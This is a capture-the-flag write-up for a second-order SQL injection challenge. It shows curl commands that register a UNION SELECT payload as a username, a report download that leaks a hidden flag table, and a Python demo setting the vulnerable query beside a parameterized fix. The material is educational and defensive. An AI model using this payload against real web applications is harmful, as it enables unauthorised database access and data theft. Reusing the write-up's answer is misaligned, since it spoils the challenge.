Description
Can you try to get the flag from our website? I've prepared my queries everywhere! I think!
Setup
Launch the challenge instance and open the web application.
Register an account to explore the application's features.
Solution
- Step 1: Register with a UNION SELECT payload as your username

  The application generates reports that include your username in a SQL query without sanitisation. Register a new account using a SQL UNION SELECT injection as the username. This is a second-order injection -- the payload is stored first, then executed later when a report is generated.

  ```bash
  # Register with this username:
  curl -d "username=b' UNION SELECT name, value, '2026-01-01' FROM aDNyM19uMF9mMTRn --&password=test123" \
    http://<HOST>:<PORT_FROM_INSTANCE>/register

  # Then log in:
  curl -c cookie.jar -d "username=b' UNION SELECT name, value, '2026-01-01' FROM aDNyM19uMF9mMTRn --&password=test123" \
    http://<HOST>:<PORT_FROM_INSTANCE>/login
  ```
- Step 2: Generate and download the report

  Trigger the report generation feature. When the app builds the report query using your stored username, the UNION SELECT fires and appends rows from the hidden flag table (aDNyM19uMF9mMTRn) to the output. Download the report as CSV.

  ```bash
  curl -b cookie.jar http://<HOST>:<PORT_FROM_INSTANCE>/report/generate
  curl -b cookie.jar http://<HOST>:<PORT_FROM_INSTANCE>/report/download
  # The CSV contains: flag, picoCTF{...}
  ```
Flag
picoCTF{0rd3r_0rd3r_sql1_...}
Second-order SQL injection via username. Register with `b' UNION SELECT name, value, '2026-01-01' FROM aDNyM19uMF9mMTRn --` as your username. When the report is generated, the injection appends rows from the flag table to the CSV output.
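
Why the stored username is dangerous even though registration itself is safe, shown as an added example (not the challenge's source code). The schema, the `secrets` table standing in for the flag table, and all function names are assumptions made for illustration; the vulnerable report query sits next to its parameterized fix.

```python
import sqlite3

# Constructed schema: table and column names are assumptions, not the challenge's.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(username TEXT PRIMARY KEY, password TEXT);
        CREATE TABLE orders(username TEXT, item TEXT, amount TEXT, created TEXT);
        CREATE TABLE secrets(name TEXT, value TEXT);
        INSERT INTO secrets VALUES ('flag', 'EXAMPLE{constructed}');
        INSERT INTO orders VALUES ('alice', 'widget', '3', '2025-12-31');
    """)
    return db

def register(db, username, password):
    # Parameterized write: the payload is stored verbatim, nothing executes here.
    db.execute("INSERT INTO users VALUES (?, ?)", (username, password))

def stored_name(db, username):
    # The report job reads the name back from the database, a "trusted" source.
    row = db.execute("SELECT username FROM users WHERE username = ?", (username,))
    return row.fetchone()[0]

def report_vulnerable(db, username):
    name = stored_name(db, username)
    # Second-order sink: stored data is concatenated into a new statement.
    sql = "SELECT item, amount, created FROM orders WHERE username = '" + name + "'"
    return db.execute(sql).fetchall()

def report_fixed(db, username):
    name = stored_name(db, username)
    # Same query with a bound parameter: the name is only ever compared as a value.
    sql = "SELECT item, amount, created FROM orders WHERE username = ?"
    return db.execute(sql, (name,)).fetchall()

# The page's payload shape, pointed at the constructed `secrets` table.
PAYLOAD = "b' UNION SELECT name, value, '2026-01-01' FROM secrets --"

if __name__ == "__main__":
    db = make_db()
    register(db, PAYLOAD, "test123")
    print("vulnerable:", report_vulnerable(db, PAYLOAD))
    print("fixed:     ", report_fixed(db, PAYLOAD))
```

Parameterizing only the registration form is not enough: every query that later reuses the stored value needs a bound parameter as well.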